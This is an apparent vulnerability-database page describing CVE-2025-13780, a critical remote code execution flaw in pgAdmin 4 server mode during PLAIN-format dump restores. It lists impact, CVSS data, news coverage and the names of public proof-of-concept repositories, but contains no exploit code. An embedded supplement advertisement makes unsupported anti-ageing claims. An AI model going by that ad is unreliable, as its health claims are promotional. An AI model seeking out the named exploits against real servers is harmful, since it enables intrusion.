Remote Code Execution Vulnerability in pgAdmin Affects Server Mode Functionality
CVE-2025-13780

9.1CRITICAL

Key Information:

Vendor

Pgadmin.org

Status
Pgadmin 4
Vendor
CVE Published:
11 December 2025

Badges

πŸ“ˆ TrendedπŸ“ˆ Score: 2,250πŸ‘Ύ Exploit Exists🟑 Public PoCπŸ“° News Worthy

What is CVE-2025-13780?

CVE-2025-13780 is a critical security vulnerability affecting pgAdmin, a popular open-source management tool for PostgreSQL databases. This vulnerability, present in pgAdmin versions up to 9.10, specifically allows for Remote Code Execution (RCE) when operating in server mode, particularly during the restoration of PLAIN-format dump files. The flaw poses a significant threat as it enables attackers to execute arbitrary commands on the server where pgAdmin is hosted. This unauthorized access can compromise the integrity and security of the database management system, potentially exposing sensitive data or enabling further exploitation of the underlying infrastructure.

Potential impact of CVE-2025-13780

  1. Data Breach Risks: Given that pgAdmin is often used to manage critical database environments, an attacker exploiting this vulnerability could lead to unauthorized access to sensitive database information, resulting in severe data breaches.

  2. Server Compromise: The ability for an attacker to execute arbitrary commands on the server could allow them to gain full control over the server environment, making it possible to install malware or use the server as a launch point for further attacks within the organizational network.

  3. Operational Disruption: Exploitation of this vulnerability could result in significant operational disruptions, including service downtime or degraded performance of database management systems, affecting business continuity and productivity for organizations reliant on pgAdmin.

Human OS v1.0:
Ageing Is an Unpatched Zero-Day Vulnerability.

Remediate biological technical debt. Prime Ageing uses 95% high-purity SIRT6 activation to maintain genomic integrity and bolster systemic resilience.

Deploy the Patch

Affected Version(s)

pgAdmin 4 0 <= 9.10

Exploit Proof of Concept (PoC)

PoC code is written by security researchers to demonstrate the vulnerability can be exploited. PoC code is also a key component for weaponization which could lead to ransomware.

CVE-2025-13780
Created by ThemeHackers

pgadmin4-9.10-CVE-2025-13780
Created by zeropwn

PoC-CVE-2025-13780
Created by meenakshisl

News Articles

favicon imageCybersecurityNews

Critical pgAdmin Vulnerability Let Attackers Execute Shell Commands on the Host

A severe security vulnerability has been uncovered in pgAdmin 4, the popular open-source PostgreSQL database management tool.

favicon imageCybersecurityNews

Critical pgAdmin Vulnerability Let Attackers Execute Shell Commands on the Host

A severe security vulnerability has been uncovered in pgAdmin 4, the popular open-source PostgreSQL database management tool.

favicon imageCyber Press

Critical pgAdmin Flaw Allows Attackers to Execute Shell Commands on Host

Tracked as CVE-2025-13780, the flaw affects pgAdmin four versions before 9.11 and exploits weaknesses in how the database administration tool validates plain-text restore operations.

References

https://github.com/pgadmin-org/pgadmin4/issues/9368
issue-tracking

CVSS V3.1

Score:
9.1
Severity:
CRITICAL
Confidentiality:
High
Integrity:
Low
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
Low
User Interaction:
None
Scope:
Changed

Timeline

  • πŸ“ˆ

    Vulnerability started trending

  • πŸ“°

    First article discovered by gbhackers.com

  • 🟑

    Public PoC available

  • πŸ‘Ύ

    Exploit known to exist

  • Vulnerability published

  • Vulnerability Reserved

JSON
.